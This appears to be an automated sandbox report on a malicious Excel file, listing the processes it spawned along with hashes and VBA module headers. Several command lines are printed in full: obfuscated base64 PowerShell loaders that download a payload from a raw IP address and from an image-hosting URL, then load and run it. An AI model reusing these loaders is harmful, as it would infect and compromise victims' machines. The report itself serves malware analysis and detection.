MCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                                                                Imagebase:0x13fb50000
                                                                File size:443'392 bytes
                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:11:48:17
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline"
                                                                Imagebase:0x13fe20000
                                                                File size:2'758'280 bytes
                                                                MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:11:48:18
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE734.tmp" "c:\Users\user\AppData\Local\Temp\1dk2y04d\CSCA659ECAEC3554F2F90108FC5834CA54.TMP"
                                                                Imagebase:0x13fdb0000
                                                                File size:52'744 bytes
                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:11:48:23
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS"
                                                                Imagebase:0xff9d0000
                                                                File size:168'960 bytes
                                                                MD5 hash:045451FA238A75305CC26AC982472367
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:11:48:23
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
                                                                Imagebase:0x13fb50000
                                                                File size:443'392 bytes
                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:11:48:29
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\System32\mshta.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                Imagebase:0x13fae0000
                                                                File size:13'824 bytes
                                                                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:11:48:36
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                                                                Imagebase:0x4a890000
                                                                File size:345'088 bytes
                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:20
                                                                Start time:11:48:36
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                                                                Imagebase:0x13fb50000
                                                                File size:443'392 bytes
                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:21
                                                                Start time:11:48:37
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.cmdline"
                                                                Imagebase:0x13f800000
                                                                File size:2'758'280 bytes
                                                                MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:22
                                                                Start time:11:48:38
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES367B.tmp" "c:\Users\user\AppData\Local\Temp\u10solcd\CSCB37CF81CE4334084B75C7031C6A4882F.TMP"
                                                                Imagebase:0x13fff0000
                                                                File size:52'744 bytes
                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:24
                                                                Start time:11:48:43
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS"
                                                                Imagebase:0xff3a0000
                                                                File size:168'960 bytes
                                                                MD5 hash:045451FA238A75305CC26AC982472367
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:25
                                                                Start time:11:48:43
                                                                Start date:13/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
                                                                Imagebase:0x13fb50000
                                                                File size:443'392 bytes
                                                                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Call Graph

                                                                • Entrypoint
                                                                • Decryption Function
                                                                • Executed
                                                                • Not Executed
                                                                • Show Help
                                                                callgraph 1 Error: Graph is empty

                                                                Module: Sheet1

                                                                Declaration
                                                                LineContent
                                                                1

                                                                Attribute VB_Name = "Sheet1"

                                                                2

                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                3

                                                                Attribute VB_GlobalNameSpace = False

                                                                4

                                                                Attribute VB_Creatable = False

                                                                5

                                                                Attribute VB_PredeclaredId = True

                                                                6

                                                                Attribute VB_Exposed = True

                                                                7

                                                                Attribute VB_TemplateDerived = False

                                                                8

                                                                Attribute VB_Customizable = True

                                                                9

                                                                Attribute VB_Name = "Sheet1"

                                                                10

                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                11

                                                                Attribute VB_GlobalNameSpace = False

                                                                12

                                                                Attribute VB_Creatable = False

                                                                13

                                                                Attribute VB_PredeclaredId = True

                                                                14

                                                                Attribute VB_Exposed = True

                                                                15

                                                                Attribute VB_TemplateDerived = False

                                                                16

                                                                Attribute VB_Customizable = True

                                                                Module: Sheet2

                                                                Declaration
                                                                LineContent
                                                                1

                                                                Attribute VB_Name = "Sheet2"

                                                                2

                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                3

                                                                Attribute VB_GlobalNameSpace = False

                                                                4

                                                                Attribute VB_Creatable = False

                                                                5

                                                                Attribute VB_PredeclaredId = True

                                                                6

                                                                Attribute VB_Exposed = True

                                                                7

                                                                Attribute VB_TemplateDerived = False

                                                                8

                                                                Attribute VB_Customizable = True

                                                                9

                                                                Attribute VB_Name = "Sheet2"

                                                                10

                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                11

                                                                Attribute VB_GlobalNameSpace = False

                                                                12

                                                                Attribute VB_Creatable = False

                                                                13

                                                                Attribute VB_PredeclaredId = True

                                                                14

                                                                Attribute VB_Exposed = True

                                                                15

                                                                Attribute VB_TemplateDerived = False

                                                                16

                                                                Attribute VB_Customizable = True

                                                                Module: ThisWorkbook

                                                                Declaration
                                                                LineContent
                                                                1

                                                                Attribute VB_Name = "ThisWorkbook"

                                                                2

                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                3

                                                                Attribute VB_GlobalNameSpace = False

                                                                4

                                                                Attribute VB_Creatable = False

                                                                5

                                                                Attribute VB_PredeclaredId = True

                                                                6

                                                                Attribute VB_Exposed = True

                                                                7

                                                                Attribute VB_TemplateDerived = False

                                                                8

                                                                Attribute VB_Customizable = True

                                                                9

                                                                Attribute VB_Name = "ThisWorkbook"

                                                                10

                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                11

                                                                Attribute VB_GlobalNameSpace = False

                                                                12

                                                                Attribute VB_Creatable = False

                                                                13

                                                                Attribute VB_PredeclaredId = True

                                                                14

                                                                Attribute VB_Exposed = True

                                                                15

                                                                Attribute VB_TemplateDerived = False

                                                                16

                                                                Attribute VB_Customizable = True

                                                                Reset < >
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000003.457024253.0000000003BA0000.00000010.00000800.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_3_3ba0000_mshta.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a5ec138e7a6c564c9d354680f6ca99cf4baf3e290d724c171bb3c462bf8355a
                                                                  • Instruction ID: 13fc75f14681bf7b1e2f9d670271491e22b012f76b533bd7cc88cebdac2ebe34
                                                                  • Opcode Fuzzy Hash: 2a5ec138e7a6c564c9d354680f6ca99cf4baf3e290d724c171bb3c462bf8355a
                                                                  • Instruction Fuzzy Hash: 7621B121B1CE8C0FE799E67C54A872577D1DB6D349F0A40FB9849D73A6E810CC818391
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000003.457034031.0000000003180000.00000010.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_3_3180000_mshta.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                  • Instruction ID: 19efd66058c127bac3491bec67b79244d0b651326c03c7cda032a1037fe940a3
                                                                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                  • Instruction Fuzzy Hash:
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000003.457034031.0000000003180000.00000010.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_3_3180000_mshta.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                  • Instruction ID: 19efd66058c127bac3491bec67b79244d0b651326c03c7cda032a1037fe940a3
                                                                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                  • Instruction Fuzzy Hash:
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000003.457034031.0000000003180000.00000010.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_3_3180000_mshta.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                  • Instruction ID: 19efd66058c127bac3491bec67b79244d0b651326c03c7cda032a1037fe940a3
                                                                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                  • Instruction Fuzzy Hash:
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000003.457034031.0000000003180000.00000010.00000800.00020000.00000000.sdmp, Offset: 03180000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_3_3180000_mshta.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                  • Instruction ID: 19efd66058c127bac3491bec67b79244d0b651326c03c7cda032a1037fe940a3
                                                                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                  • Instruction Fuzzy Hash:

                                                                  Execution Graph

                                                                  Execution Coverage:4.3%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:3
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 3758 7fe899c7ae1 3759 7fe899c7af1 URLDownloadToFileW 3758->3759 3761 7fe899c7c00 3759->3761

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.485677461.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7fe899c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: DownloadFile
                                                                  • String ID:
                                                                  • API String ID: 1407266417-0
                                                                  • Opcode ID: 9948bc6d770e860b75fa454e1b26024c9bb87e678cf14dd0d4350483a9068b22
                                                                  • Instruction ID: dd9d2aec8907b5c0eb7b7e7fbd4249ce01c59a8a7d2b2634bc6a0a032837168b
                                                                  • Opcode Fuzzy Hash: 9948bc6d770e860b75fa454e1b26024c9bb87e678cf14dd0d4350483a9068b22
                                                                  • Instruction Fuzzy Hash: 14319F31918A5C9FDB58EF5CD885BA9B7E1FB59725F00822ED04DD3661CB70B8068B81

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.485746515.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7fe89a90000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: V
                                                                  • API String ID: 0-1342839628
                                                                  • Opcode ID: 6c35dcf3e6948fa27e2fd6f0f4b6ec656cef08ce367f88c314207af66fa8e2d1
                                                                  • Instruction ID: 852d5ed837396677f302a9c4512be2a1db2d51052ec6905325455b106315274d
                                                                  • Opcode Fuzzy Hash: 6c35dcf3e6948fa27e2fd6f0f4b6ec656cef08ce367f88c314207af66fa8e2d1
                                                                  • Instruction Fuzzy Hash: AED1F43080E7C91FD35797389C156AA7FA4EF47260F0911EBD48DCB0A3D619AD5AC3A2

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.485677461.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7fe899c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: DownloadFile
                                                                  • String ID:
                                                                  • API String ID: 1407266417-0
                                                                  • Opcode ID: 3564d2ac142c4a064d696a39380aff265b310662ce154e6a372ec1fea6ce31e1
                                                                  • Instruction ID: 641bd9236fe160d63ae29a915ee22288c1fc05c9ce19101104c63db51e3d72cf
                                                                  • Opcode Fuzzy Hash: 3564d2ac142c4a064d696a39380aff265b310662ce154e6a372ec1fea6ce31e1
                                                                  • Instruction Fuzzy Hash: 6041E67181CB889FD719DB589C447AABBF4FB56325F04426FD08DD35A2CB646806C781

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
